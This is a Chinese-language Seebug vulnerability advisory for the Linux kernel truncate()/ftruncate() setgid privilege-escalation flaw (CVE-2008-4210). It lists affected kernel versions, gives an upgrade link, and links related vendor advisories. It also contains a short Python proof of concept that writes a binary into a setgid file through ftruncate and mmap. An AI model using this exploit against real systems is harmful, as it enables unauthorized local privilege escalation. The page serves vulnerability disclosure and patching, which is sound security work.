Lucene search
RootSSV:4118HistorySep 27, 2008 - 12:00 a.m.
Linux Kernel 'truncate()'本地特权提升漏洞
2008-09-2700:00:00
Root
www.seebug.org
41
0.0004 Low
EPSS
Percentile
0.4%
BUGTRAQ ID: 31368
CVE ID:CVE-2008-4210
CNCVE ID:CNCVE-20084210
Linux是一款开放源代码的操作系统。
Linux内核’truncate()'和’ftruncate()'函数存在设计错误,本地攻击者可以利用漏洞提升特权。
当建立文件时,open()/creat()允许通过模式参数设置setgid位,由于bsdgroups mount选项或在setgid目录中建立文件,用户不属于新文件的组的成员。用户可以使用ftruncate()和memory-mapped I/O使新文件成为任意两进制,获得此组的特权,原因是这些操作没有清除setgid位。
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20
- Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc3 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18 - Debian Linux 4.0 sparc
- Debian Linux 4.0 s/390
- Debian Linux 4.0 powerpc
- Debian Linux 4.0 mipsel
- Debian Linux 4.0 mips
- Debian Linux 4.0 m68k
- Debian Linux 4.0 ia-64
- Debian Linux 4.0 ia-32
- Debian Linux 4.0 hppa
- Debian Linux 4.0 arm
- Debian Linux 4.0 amd64
- Debian Linux 4.0 alpha
- Debian Linux 4.0
- Trustix Secure Enterprise Linux 2.0
- Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
- Trustix Secure Linux 2.0
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.10 - Trustix Secure Enterprise Linux 2.0
- Trustix Secure Linux 2.2
- Trustix Secure Linux 2.1
- Trustix Secure Linux 2.0
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.21-RC6
Linux kernel 2.6.21-RC5
Linux kernel 2.6.21-RC4
Linux kernel 2.6.21-RC3
Linux kernel 2.6.21-RC3
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20.1
Linux kernel 2.6.20-rc2
Linux kernel 2.6.20-2
Linux kernel 2.6.18-8.1.8.el5
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.15.5
Linux kernel 2.6.15.11
Linux kernel 2.6.15-27.48
Linux kernel 2.6.11.4
可升级到最新的Linux内核:
<a href=“http://www.linux.org/” target=“_blank”>http://www.linux.org/</a>
#!/usr/bin/env python
import os
import mmap
bin = file("/usr/bin/id").read()
fd = os.open("id", os.O_RDWR | os.O_CREAT | os.O_EXCL, 02750)
os.ftruncate(fd, len(bin))
m = mmap.mmap(fd, len(bin))
m[:] = bin
m.flush()
Related
prion
prion
Design/Logic Flaw
2008-09-29 17:17:00
Design/Logic Flaw
2008-10-03 17:41:00
veracode
veracode
Privilege Escalation
2020-04-10 00:28:05
cve
cve
CVE-2008-4210
2008-09-29 17:17:00
CVE-2008-3833
2008-10-03 17:41:00
ubuntucve
ubuntucve
CVE-2008-4210
2008-09-29 00:00:00
CVE-2008-3833
2008-10-03 00:00:00
suse
suse
denial of service in kernel
2008-12-03 11:07:23
denial of service in kernel
2008-12-04 18:25:26
local privilege escalation in kernel
2008-10-21 11:36:32
openvas
openvas
SLES9: Security update for Linux kernel
2009-10-10 00:00:00
SuSE Update for kernel SUSE-SA:2008:056
2009-01-23 00:00:00
SLES9: Security update for Linux kernel
2009-10-10 00:00:00
nessus
nessus
SuSE 10 Security Update : Linux Kernel (x86) (ZYPP Patch Number 5734)
2008-12-03 00:00:00
SuSE 10 Security Update : Linux Kernel (x86_64) (ZYPP Patch Number 5735)
2012-05-17 00:00:00
SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 5668)
2009-09-24 00:00:00
redhat
redhat
(RHSA-2008:0972) Important: kernel security and bug fix update
2008-11-19 00:00:00
(RHSA-2008:0973) Important: kernel security and bug fix update
2008-12-16 00:00:00
(RHSA-2008:0957) Important: kernel security and bug fix update
2008-11-04 00:00:00
oraclelinux
oraclelinux
kernel security and bug fix update
2008-11-19 00:00:00
kernel security and bug fix update
2008-11-05 00:00:00
kernel security and bug fix update
2008-12-18 00:00:00
centos
centos
kernel security update
2008-11-20 14:26:01
kernel security update
2008-12-17 15:30:17
kernel security update
2008-11-05 16:01:40
securityvulns
securityvulns
Linux kernel multiple security vulnerabilities
2008-10-18 00:00:00
debian
debian
osv
osv
fai-kernels linux-2.6 user-mode-linux - several vulnerabilities
2008-10-13 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2008-11-27 00:00:00
vmware
vmware